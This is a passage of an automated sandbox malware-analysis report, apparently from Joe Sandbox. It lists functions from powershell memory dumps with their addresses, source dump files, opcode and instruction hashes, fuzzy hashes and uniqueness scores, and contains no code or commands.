                              • Opcode ID: 16f69d7b7050aa29d4f110ddd53858471818f30f4b4c8d36d35ef3df30fd3977
                              • Instruction ID: 89057f0746e7e09d3f2b123cef385be4a09fa4075598b3bd2948e65ff67e7e01
                              • Opcode Fuzzy Hash: 16f69d7b7050aa29d4f110ddd53858471818f30f4b4c8d36d35ef3df30fd3977
                              • Instruction Fuzzy Hash: 4DE092323093418FC395EB7C904175DFBD29FA9210708CC9FD29AC7712CE209949872A
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 067D5C78 Relevance: .0, Instructions: 23COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 0000001F.00000002.440220248.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_31_2_67d0000_powershell.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: d7a463e0a9ffcc035059e6fcc32c8f9efbbdd3cd591988ea95a357ddeceb0920
                              • Instruction ID: 361069345f887c35cc4c8588f4e8d6162ac7b7abd1795433a2ebf331b044d815
                              • Opcode Fuzzy Hash: d7a463e0a9ffcc035059e6fcc32c8f9efbbdd3cd591988ea95a357ddeceb0920
                              • Instruction Fuzzy Hash: 5BE0ECBAA04119AF96009E45EC45C57FFACFB896743154296F90897302C731FC81CBF0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 067DDC53 Relevance: .0, Instructions: 23COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 0000001F.00000002.440220248.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_31_2_67d0000_powershell.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 591f2d4f854f08f4de2b18eeb74585569a93c47aa821d04848b6d62c850e6958
                              • Instruction ID: 94e84263f20162a98cbb101bb88abe851ac41416b2695f2cd6fc0129423f7e97
                              • Opcode Fuzzy Hash: 591f2d4f854f08f4de2b18eeb74585569a93c47aa821d04848b6d62c850e6958
                              • Instruction Fuzzy Hash: 7AE0DF70B0A3028FC3298E3AA4104A23BB29F84221301C4AAA84AC7301EB38D941CB40
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 067D8D20 Relevance: .0, Instructions: 23COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 0000001F.00000002.440220248.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_31_2_67d0000_powershell.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: fa84a47f17b9d637beef5fd1277cb810100d6382801266b9212efdcdb6c21805
                              • Instruction ID: 63871f72bb0e1637de89b745ed12842c4583febf6c8fa19290dc4dcfe795b11b
                              • Opcode Fuzzy Hash: fa84a47f17b9d637beef5fd1277cb810100d6382801266b9212efdcdb6c21805
                              • Instruction Fuzzy Hash: 3BE0DF3230A3804F8250E76D944099EEAD69FEA2103088C5FE25AC3722CA109908C33A
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 067D39A9 Relevance: .0, Instructions: 22COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 0000001F.00000002.440220248.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_31_2_67d0000_powershell.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 12e2af4fa3ab894c5fbbf69c0cc76e7840c75252516e8af90d9d8d0a045f8e0d
                              • Instruction ID: 54b11db0a6f56792816f80198639b19a6768eb28de18398e43a0373b364e26d8
                              • Opcode Fuzzy Hash: 12e2af4fa3ab894c5fbbf69c0cc76e7840c75252516e8af90d9d8d0a045f8e0d
                              • Instruction Fuzzy Hash: C5D02B7BB001182F9B488577ED4966A6B9AEFC41B132DC436E90CD3200ED31CC4282A0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 067D0E80 Relevance: .0, Instructions: 21COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 0000001F.00000002.440220248.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_31_2_67d0000_powershell.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 695665edc8d666bbde3f2929c4bbacd8e22be2ceb7f393a715898b4eba6f79cd
                              • Instruction ID: 3decb123583068c6f688d15bfb8959ac3290daa9f04ad60c69f4e10da241aa53
                              • Opcode Fuzzy Hash: 695665edc8d666bbde3f2929c4bbacd8e22be2ceb7f393a715898b4eba6f79cd
                              • Instruction Fuzzy Hash: 3BD05E2130160557E254A6B9E858B7F72CFCBC5369F920479D70ED7783EE26AC1207E2
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 068DD222 Relevance: .0, Instructions: 21COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 0000001F.00000002.440650410.00000000068D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068D0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_31_2_68d0000_powershell.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: cacc97f9e3aa1745637e5c80d3816fdc1c57792c3309ddb1d11cfce98c6f1d3d
                              • Instruction ID: 71ea002d7d5cea316419ec5ad9ea2a46c4f54d813ce1631ad914b2b5d2b0aec8
                              • Opcode Fuzzy Hash: cacc97f9e3aa1745637e5c80d3816fdc1c57792c3309ddb1d11cfce98c6f1d3d
                              • Instruction Fuzzy Hash: 24E086372501008FE750EB64E44576D77A7DF84325F00882AD22AC7951DB39A9064B91
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 068DD265 Relevance: .0, Instructions: 21COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 0000001F.00000002.440650410.00000000068D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068D0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_31_2_68d0000_powershell.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 886d3e0dcdfdeae3e92729fade18a60c75e711ec55e44fe8d902f91fd2ae6a77
                              • Instruction ID: d6ad7d5628c558edbf49a738815379bb95268058f7000a70aa5543fdf21d6857
                              • Opcode Fuzzy Hash: 886d3e0dcdfdeae3e92729fade18a60c75e711ec55e44fe8d902f91fd2ae6a77
                              • Instruction Fuzzy Hash: 67E086376141008FD750EB64E845BADB7A6EF84325F00882AD23AC7951DB39B9068B95
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 067DED57 Relevance: .0, Instructions: 20COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 0000001F.00000002.440220248.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_31_2_67d0000_powershell.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: cf3a9ed44fa36e039551c8076ff8f041a871830cbdaddd348d1a9645905a8301
                              • Instruction ID: 493efea50623097bc0d3c7afa081ee345429e8bfafaa59c20217180f3eba9e44
                              • Opcode Fuzzy Hash: cf3a9ed44fa36e039551c8076ff8f041a871830cbdaddd348d1a9645905a8301
                              • Instruction Fuzzy Hash: 99E01739B855148FEB981B68E9582BD7377F7D4716F10D826E61BC2580CF3989414BC0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 067D42B0 Relevance: .0, Instructions: 19COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 0000001F.00000002.440220248.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_31_2_67d0000_powershell.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 472af60b176980af6b287df6f4b7ce611fac1c8613affbf95ec0987f149315dc
                              • Instruction ID: dac811ab6a84dad4f6362de01562bd1b4f4180307c12b418f35d2ad8c0cd0f56
                              • Opcode Fuzzy Hash: 472af60b176980af6b287df6f4b7ce611fac1c8613affbf95ec0987f149315dc
                              • Instruction Fuzzy Hash: A5E04F626082A15FC7424A54E820466FFA6AF8A21171D85C7E9C49B297C23ADDC2DB90
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 067D42E7 Relevance: .0, Instructions: 17COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 0000001F.00000002.440220248.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_31_2_67d0000_powershell.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 45e4faeee5de15d981dd6aa1374af2f307b9a182044cdf6847757cbcb833e71c
                              • Instruction ID: e5f44b3edb9262597e4e2aa0497985ba3bf62e5a5a39fa62b5eb90560cc0726d
                              • Opcode Fuzzy Hash: 45e4faeee5de15d981dd6aa1374af2f307b9a182044cdf6847757cbcb833e71c
                              • Instruction Fuzzy Hash: 56D0121840E7811FCA229B345C528D72FF4A9475603CE0BC6F1D1DF4E3D318465792A5
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 067D3DC7 Relevance: .0, Instructions: 17COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 0000001F.00000002.440220248.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_31_2_67d0000_powershell.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 808c575eeb0066dc2fd02d500f42987968f05cd3c69bcf7ffc1a8564fbd95597
                              • Instruction ID: b53aa4168f9a7e9629eda9ea19442f73c2693577d201307b487ef6d93dc159f3
                              • Opcode Fuzzy Hash: 808c575eeb0066dc2fd02d500f42987968f05cd3c69bcf7ffc1a8564fbd95597
                              • Instruction Fuzzy Hash: F8D05E326086E05FC7429B2068105E37FE29F4621572D85CAE888DF287E63A8D578BA1
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 067D4310 Relevance: .0, Instructions: 16COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 0000001F.00000002.440220248.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_31_2_67d0000_powershell.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 2aa37fd05ed194cc6c16dfcea33d79c1eb072a0fbaad82dfebc1328486ed9d99
                              • Instruction ID: b2020d89394f08e9161adde48bdb17428e9a22c872d90a66608675377101d3a5
                              • Opcode Fuzzy Hash: 2aa37fd05ed194cc6c16dfcea33d79c1eb072a0fbaad82dfebc1328486ed9d99
                              • Instruction Fuzzy Hash: 9CD0C92518E7C22FCB1296344C26CC62F7499571107D907CBF1D29E1A3E358029BD2A6
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 067D3DF0 Relevance: .0, Instructions: 16COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 0000001F.00000002.440220248.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_31_2_67d0000_powershell.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: e2cc1945ae4a01135f2269cbd221ea4a9c5a011ec435388a682a4bb0cca08ac5
                              • Instruction ID: bb6faa692d29d38f932ad0b4373755ded07bfaf31c839f6dc54cbeabc6f889c1
                              • Opcode Fuzzy Hash: e2cc1945ae4a01135f2269cbd221ea4a9c5a011ec435388a682a4bb0cca08ac5
                              • Instruction Fuzzy Hash: 23D012355096A04FC75797145810166BFA19F4611432D84CBD498DF19BC226DD13C7D1
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 067D2390 Relevance: .0, Instructions: 13COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 0000001F.00000002.440220248.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_31_2_67d0000_powershell.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: cda0b0696403cbe3e0daf9fb76d5daed3f30ad17814a2f1360f983e34e51b7e9
                              • Instruction ID: 89cc1dae0fb3d88446c4765a7bbfc8e47ad96e9e830bd82dd66b73a8b18cd344
                              • Opcode Fuzzy Hash: cda0b0696403cbe3e0daf9fb76d5daed3f30ad17814a2f1360f983e34e51b7e9
                              • Instruction Fuzzy Hash: 00D0123440E3807FE75316705C14EC6BF615B6B305F058697F2C584162C1550554D776
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 067D35C0 Relevance: .0, Instructions: 10COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 0000001F.00000002.440220248.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_31_2_67d0000_powershell.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 584f3593144e3a4bd5567f8bc2298a0075260034fed426fa76cbb92effbc0bb0
                              • Instruction ID: 52bf958f59ab464d98dbfb2802196dc696c0a718da2cf80a6dd2dcd0522cba27
                              • Opcode Fuzzy Hash: 584f3593144e3a4bd5567f8bc2298a0075260034fed426fa76cbb92effbc0bb0
                              • Instruction Fuzzy Hash: 8DC08C3AF0100A8FCB00DB94F884CDCF7B1FBD8225B04C022E1019B101C7319021DB00
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 067DEDF0 Relevance: .0, Instructions: 10COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 0000001F.00000002.440220248.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_31_2_67d0000_powershell.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 187d223d0f937d2e2e9b97d5c9cc55d794f5051e5e28a7a91b42a506bd1cc65e
                              • Instruction ID: c918b23e30758c833dca9579017bc86b025176aae6975d791b16c5b9ea0f9373
                              • Opcode Fuzzy Hash: 187d223d0f937d2e2e9b97d5c9cc55d794f5051e5e28a7a91b42a506bd1cc65e
                              • Instruction Fuzzy Hash: 7AB09236B440148B9B085AA8B8480ECF37AE6D422AB10D477D72BC2001CB3A89294BC0
                              Uniqueness

                              Uniqueness Score: -1.00%